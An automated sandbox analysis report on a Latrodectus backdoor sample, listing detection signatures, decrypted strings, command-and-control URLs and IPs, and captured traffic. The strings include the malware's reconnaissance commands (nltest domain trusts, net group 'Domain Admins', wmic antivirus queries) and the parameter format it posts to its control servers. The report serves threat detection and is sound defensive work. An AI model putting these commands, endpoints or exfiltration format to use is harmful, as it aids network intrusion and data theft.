Windows Analysis Report
360total.dll.dll

Overview

General Information

Sample name: 360total.dll.dll
(renamed file extension from exe to dll)
Original sample name: 360total.dll.exe
Analysis ID: 1431883
MD5: 74143402c40ac2e61e9f040a2d7e2d00
SHA1: 4053dc85bb86c47c63f96681d6a62c21cd6342a3
SHA256: 1625ac230aa5ca950573f3ba0b1a7bd4c7fbd3e3686f9ecd4a40f1504bf33a11
Tags: exe

Detection

Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Deletes itself after installation
PE file contains section with special chars
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Unidentified 111 (Latrodectus), Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

AV Detection

Source: 9.2.rundll32.exe.22380120000.1.raw.unpack Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c ipconfig /all
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c systeminfo
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c nltest /domain_trusts
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c net view /all /domain
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c nltest /domain_trusts /all_trusts
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c net view /all
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &ipconfig=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c net group "Domain Admins" /domain
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c net config workstation
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /c whoami /groups
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\Windows\System32\cmd.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &systeminfo=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &domain_trusts=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &domain_trusts_all=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_view_all_domain=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_view_all=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_group=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &wmic=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_config_ws=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &net_wmic_av=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &whoami_group=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "pid":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%d",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "proc":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "subproc": [
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &proclist=[
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "pid":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%d",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "proc":
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s",
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "subproc": [
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &desklinks=[
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: *.*
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Update_%x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Custom_update
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: .dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: .exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Updater
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: rundll32.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: "%s", %s %s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: runnung
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: :wtfbbq
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: files/bp.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s\%d.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %d.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s\%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: init -zzzz="%s\%s"
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: front
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: /files/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Facial
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: !"$%&()*wp
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: .exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: POST
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: GET
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: curl/7.88.1
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: CLEARURL
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: URLS
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: COMMAND
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: ERROR
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: <html>
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: <!DOCTYPE
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s%d.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: 12345
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &stiller=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %s%d.exe
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: LogonTrigger
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %x%x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: TimeTrigger
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: PT0H%02dM
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &mac=
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %02x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: :%02x
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: PT0S
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &computername=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: &domain=%s
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: \*.dll
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: %04X%04X%04X%04X%08X%04X
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: \Registry\Machine\
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: https://jarinamaers.shop/live/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: https://wrankaget.site/live/
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: AppData
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Desktop
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Startup
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Personal
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Local AppData
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: \update_data.dat
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: URLS
Source: 9.2.rundll32.exe.22380120000.1.raw.unpack String decryptor: URLS|%d|%s
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 3_2_000000018003BC0C
Source: unknown HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr

Spreading

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CA350 FindFirstFileW,FindNextFileW,LoadLibraryW, 4_2_00000203431CA350
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 4_2_00000203431C1A08
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_000002238013A350 FindFirstFileW,FindNextFileW,LoadLibraryW, 9_2_000002238013A350
Source: C:\Windows\System32\rundll32.exe Code function: 9_2_0000022380131A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 9_2_0000022380131A08

Networking

Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.219.28 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 172.67.136.103 443
Source: Malware configuration extractor URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor URLs: https://wrankaget.site/live/
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: grizmotras.comContent-Length: 180Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C4F58 InternetReadFile, 4_2_00000203431C4F58
Source: global traffic DNS traffic detected: DNS query: jarinamaers.shop
Source: global traffic DNS traffic detected: DNS query: grizmotras.com
Source: unknown HTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr String found in binary or memory: ftp://ftp%2desktop.ini
Source: rundll32.exe String found in binary or memory: http://dr.f.360.cn/scan
Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr String found in binary or memory: http://dr.f.360.cn/scanlist
Source: rundll32.exe String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000002.2040211830.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2039615280.0000020344C70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3283224321.0000000180086000.00000002.00000001.01000000.00000006.sdmp, 360total.dll.dll, Update_79066994.dll.4.dr String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: Amcache.hve.8.dr String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/g
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256142995.00000223820D0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/)
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/U
Source: rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://grizmotras.com/live/p
Source: rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/7
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255692997.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/7-
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3110073798.00000223FFF2E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/&
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFE88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/4K&
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3255032660.00000223FFF5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/live/dOIDInfo
Source: rundll32.exe, 00000009.00000002.3284739426.00000223FFEEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/n
Source: rundll32.exe, 00000009.00000003.3110073798.00000223FFF70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jarinamaers.shop/rs
Source: rundll32.exe, 00000009.00000003.3256160470.0000022382090000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.3256142995.00000223820D0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://pewwhranet.com/live/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49730 version: TLS 1.2

System Summary

Source: 360total.dll.dll Static PE information: section name: yhDm^
Source: Update_79066994.dll.4.dr Static PE information: section name: yhDm^
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C78C0 NtReadFile, 4_2_00000203431C78C0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CB0C4 NtOpenKey,RtlpNtOpenKey, 4_2_00000203431CB0C4
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7B40 NtFreeVirtualMemory, 4_2_00000203431C7B40
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CAD34 NtAllocateVirtualMemory, 4_2_00000203431CAD34
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C378C NtClose, 4_2_00000203431C378C
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C7588 RtlInitUnicodeString,NtCreateFile,NtClose, 4_2_00000203431C7588
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431C77B0 RtlInitUnicodeString,NtCreateFile, 4_2_00000203431C77B0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000203431CB1D4 NtQueryValueKey,NtQueryValueKey,NtClose, 4_2_00000203431CB1D4
